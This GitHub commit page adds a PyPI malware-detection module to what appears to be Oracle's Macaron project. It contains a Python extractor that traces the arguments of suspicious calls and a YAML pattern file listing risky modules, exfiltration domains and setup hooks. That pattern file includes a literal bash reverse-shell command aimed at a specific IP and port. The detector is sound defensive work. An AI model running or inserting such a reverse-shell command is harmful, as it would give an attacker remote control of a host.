Skip to content

Commit

Permalink
chore: implement method to validate suspicious packages for malicious…
Browse files Browse the repository at this point in the history
… behavior
  • Loading branch information
Yao-Wen-Chang committed Sep 4, 2024
1 parent 6c305a9 commit 9ebfdc9
Show file tree
Hide file tree
Showing 4 changed files with 540 additions and 22 deletions.
339 changes: 339 additions & 0 deletions src/macaron/malware_analyzer/pypi_heuristics/pypi_source_extractor.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,339 @@
# Copyright (c) 2024 - 2024, Oracle and/or its affiliates. All rights reserved.
# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/.

"""
Detect suspicious function calls in the code and trace the arguments back to their original values.
This allows for deeper analysis of potentially malicious behavior.
"""

import ast
import logging
import os
import pathlib
import re

import yaml

from macaron.json_tools import JsonType
from macaron.slsa_analyzer.package_registry.pypi_registry import PyPIPackageJsonAsset

logger: logging.Logger = logging.getLogger(__name__)


class PyPISuspiciousCodeExtractor:
"""This class is used to extract the suspicious content from the source code."""

def __init__(self, pypi_package_json: PyPIPackageJsonAsset) -> None:
"""Collect required data for analysing the source code."""
self.source_code: dict[str, str] | None = pypi_package_json.get_sourcecode()
suspicious_pattern: dict[str, JsonType] | None = self._load_suspicious_pattern()
self.extracted_data: dict[str, JsonType] = {}
if self.source_code and suspicious_pattern:
self.extracted_data = self._extract_data_from_source(suspicious_pattern)

def _load_suspicious_pattern(self) -> dict[str, JsonType] | None:
"""Load the suspicious imports from suspicious_pattern.yaml.
Returns
-------
dict[str, JsonType]
The suspicious pattern.
"""
filename: str = "suspicious_pattern.yaml"
curr_dir: pathlib.Path = pathlib.Path(__file__).parent.absolute()
suspicious_pattern_file: str = os.path.join(curr_dir, filename)
with open(suspicious_pattern_file, encoding="utf-8") as file:
try:
suspicious_pattern: dict[str, JsonType] = yaml.safe_load(file)
except yaml.YAMLError as yaml_exception:
logger.debug("Error parsing the yaml file: '%s'", yaml_exception)
return None
return suspicious_pattern

def _extract_data_from_source(self, suspicious_pattern: dict[str, JsonType]) -> dict[str, JsonType]:
"""
Extract the install requires and usage of the module from source code.
Parameters
----------
suspicious_pattern: dict[str, JsonType]
The suspicious pattern defined in the suspicious_pattern.yaml
Returns
-------
dict[str, JsonType | JsonType]
The suspicious behaviours within the source code.
"""
logger.debug("Extracting required data for source code analysis")
extracted_data: dict[str, JsonType] = {}
if self.source_code and suspicious_pattern:
for filename, content in self.source_code.items():
try:
imports = self._extract_imports_from_ast(content)
except SyntaxError:
imports = self._extract_imports_from_lines(content)

if isinstance(suspicious_pattern["imports"], list):
target_imports: set[str] | None = imports & set(suspicious_pattern["imports"])
else:
target_imports = None

# Found suspicious import in the source code
if target_imports:
suspicious_content: list[JsonType] | None = extract_suspicious_content(
content, target_imports, suspicious_pattern
)
if not suspicious_content:
continue
if "suspicious_content" not in extracted_data:
extracted_data["suspicious_content"] = {}
if isinstance(extracted_data["suspicious_content"], dict):
extracted_data["suspicious_content"][filename] = suspicious_content
# TODO: implement this as another heuristic or as malware validation
# if filename == "setup.py":
# Catch the install_requires packages
# TODO: Implement other suspicious setup in suspicious_pattern.yaml
# pattern = r"install_requires\s*=\s*\[(.*?)\]"
# matches: re.Match | None = re.search(pattern, content, re.DOTALL)
# if matches:
# install_requires: set[str] | None = set(re.findall(r"'(.*?)'", matches.group(1)))
# if (
# install_requires
# and install_requires & set(self.suspicious_pattern["imports"])
# and len(install_requires) < 4
# # This threshold is based on historical malwares
# ):
# extracted_data["install_requires"] = install_requires
return extracted_data

def get_extracted_data(self) -> dict[str, JsonType]:
"""Get the required data from the extracted source code.
Returns
-------
JsonType
The data required for analysis
"""
return self.extracted_data

def _extract_imports_from_ast(self, content: str) -> set[str]:
"""Extract imports from source code using the parsed AST.
Parameters
----------
source_content: str
The source code as a string.
Returns
-------
set[str]
The set of imports.
Raises
------
SyntaxError
If the code could not be parsed.
"""
imports = set()
tree = ast.parse(content)
for node in ast.walk(tree):
if isinstance(node, ast.Import):
for alias in node.names:
imports.add(alias.name)
elif isinstance(node, ast.ImportFrom):
module = node.module
if module:
_module = "." * node.level + module
imports.add(_module)
for name in node.names:
imports.add(_module + "." + name.name)

return imports

def _extract_imports_from_lines(self, content: str) -> set[str]:
"""Extract imports from source code using per line pattern matching.
Parameters
----------
source_content: str
The source code as a string.
Returns
-------
set[str]
The list of imports.
"""
alias_pattern = r"\s+as\s+\w+(?:\.{0,1}\w+)*"
# Pattern for module aliases.

module_name = r"\w+(?:\.{0,1}\w+"
# <module_name> as described under pattern_import.

pattern_import = (
r"(?:import\s+)(" + module_name + r")*(?:" + alias_pattern + r")?"
r"(?:(?:\s*,\s*)(?:" + module_name + r")*(?:" + alias_pattern + r")?))*)(?:(?:\s|#).*)?"
)
# Allows for a standard import statement.
# E.g.: import <module_name(s)> <other_text>
# Where <module_name(s)> consists of one or more <module_name>.
# Where <module_name> consists of one or more words (a-z or 0-9 or underscore) separated by periods,
# with an optional alias.
# Where <other_text> allows any character(s) either after a single space or a hash (#).

pattern_from_import = (
r"(?:from\s+)([.]*"
+ module_name
+ r")*)(?:\s+import\s+(\w+(?:\s+as\s+\w+)?(?:(?:\s*,\s*)(?:\w+(?:\s+as\s+\w+)?))*))"
)
# Allows for a from import statement.
# E.g.: from <module_name> import <module_component(s)> <other_text>
# Where <module_name> is as above, but can also be preceded by any number of periods.
# (Note only a single module can be placed here.)
# Where <module_component(s)> consists of one or more <module_component> with optional aliases.
# Where <module_component> is identical to <module_name> except without any periods.
# Where <other_text> requires at least one space followed by one or more word characters, plus
# any other characters following on from that.

combined_pattern = f"^(?:{pattern_import})|(?:{pattern_from_import})$"
# The combined pattern creates two match groups:
# 1 - standard import statement.
# 2 - from import statement module.
# 3 - from import statement module components.

imports = set()
for line in content.splitlines():
line.strip()
match = re.match(combined_pattern, line)
if not match:
continue

if match.group(1):
# Standard import, handle commas and aliases if present.
splits = self._prune_aliased_lines(match.group(1), alias_pattern)
for split in splits:
imports.add(split)
elif match.group(2):
# From import
imports.add(match.group(2))
if match.group(3):
splits = self._prune_aliased_lines(match.group(3), alias_pattern)
for split in splits:
imports.add(match.group(2) + "." + split)

return imports

def _prune_aliased_lines(self, text: str, alias_pattern: str) -> list[str]:
"""Split the line on commas and remove any aliases from individual parts."""
results = []
splits = text.split(",")
for split in splits:
split = split.strip()
results.append(re.sub(alias_pattern, "", split))
return results


class FunctionCallAnalyzer(ast.NodeVisitor):
"""The class is used to extract the function call from the tree nodes."""

def __init__(self, target_import_modules: set[str], suspicious_pattern: dict[str, JsonType]) -> None:
self.targets: list[JsonType] = []
self.suspicious_modules: set[str] = target_import_modules
self.suspicious_pattern: dict[str, JsonType] = suspicious_pattern
self.assignments: dict = {} # Store the assignment for dataflow analysis

def get_targets(self) -> list[JsonType]:
"""
Get the argument value of the suspicious function.
Returns
-------
JsonType
The argument value of the suspicious function.
"""
return self.targets

def visit_Module(self, node: ast.Module) -> None: # noqa: N802 # pylint: disable=C0103
"""Visit all root node."""
self.generic_visit(node)

def visit_Call(self, node: ast.Call) -> None: # noqa: N802 # pylint: disable=C0103
"""Visit the expression."""
if isinstance(node.func, ast.Attribute):
if isinstance(node.func.value, ast.Name):
module: str | None = self._find_module_in_node(node.func.value.id)
if module:
for arg in node.args:
if isinstance(arg, ast.Name): # Argument is a variable
argument = arg.id
while True:
if argument in self.assignments:
argument = self.assignments[argument]
else:
break
self.targets.append({"suspicious_arg": argument, "line_num": node.lineno})
elif isinstance(arg, ast.Constant): # Argument is a string
self.targets.append({"suspicious_arg": arg.value, "line_num": node.lineno})
self.generic_visit(node)

def visit_Assign(self, node: ast.Assign) -> None: # noqa: N802 # pylint: disable=C0103
"""Visit the assignment."""
if isinstance(node.targets[0], ast.Name):
var_name = node.targets[0].id

# Handle constant assignments
if isinstance(node.value, ast.Constant):
var_value = node.value.value
self.assignments[var_name] = var_value

# Handle variable-to-variable assignments
elif isinstance(node.value, ast.Name):
ref_name = node.value.id
self.assignments[var_name] = ref_name

def _find_module_in_node(self, node_module: str) -> str | None:
"""Check whether the module is suspicious."""
if isinstance(self.suspicious_pattern["imports"], list) and node_module in self.suspicious_pattern["imports"]:
return node_module
return None


def extract_suspicious_content(
code: str, target_import_modules: set[str], suspicious_pattern: dict[str, JsonType]
) -> list[JsonType] | None:
"""
Parse the source code into an Abstract Syntax Tree (AST) and analyze the nodes for suspicious activity.
Parameters
----------
code : str
The source code of the script to be analyzed.
target_import_modules : set[str]
The set of target modules to discover from the AST nodes.
suspicious_pattern: dict[str, JsonType]
The pattern defined in suspicious_pattern.yaml
Returns
-------
list[JsonType] | None
A list of dictionaries containing the extracted results from the AST nodes, grouped by module.
Each dictionary includes the module name and a list of suspicious findings with the following details:
- line_num (int): The line number in the source code where the suspicious call is made.
- suspicious_arg (str): The suspicious content or argument involved in the call.
Example
-------
A list of dictionaries with suspicious findings:
[
{"line_num": 42, "suspicious_arg": "http://suspicious-remote.com"},
{"line_num": 85, "suspicious_arg": "ADDASEFV=="}
]
"""
tree = ast.parse(code)
analyzer = FunctionCallAnalyzer(target_import_modules, suspicious_pattern)
analyzer.visit(tree)
res: list[JsonType] = analyzer.get_targets()
if not res:
return None
return res
Original file line number Diff line number Diff line change
@@ -0,0 +1,52 @@
# Copyright (c) 2024 - 2024, Oracle and/or its affiliates. All rights reserved.
# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/.

# This file defines the functions and modules that trigger the
# malicious behaviours.
# Some pattern defined here might be deprecated in a newer version, but we still keep it here.
# The pattern defined here is based on the historical malwares.

imports:
- requests
- base64
- Fernet
# - getpass
# - platform
# - os

pacakges:
- name:
- requests
method:
- get
- post

- name:
- exec

- name:
- subprocess.
method:
- Popen

domains:
- webhook.site
- discord
- telegram

local_path:
- /storage/emulated/0/ # Android: primary user account on the device

setup:
- cmdclass # Replace the pip command, for example `install`
- install_requires
- setup_requires # Deprecation

file_postfix:
- .exe

reverse_shell:
- bash -c "bash -i >& /dev/tcp/81.46.246.181/4444 0>&1"

other:
- os.name = "nt"
Loading

0 comments on commit 9ebfdc9

Please sign in to comment.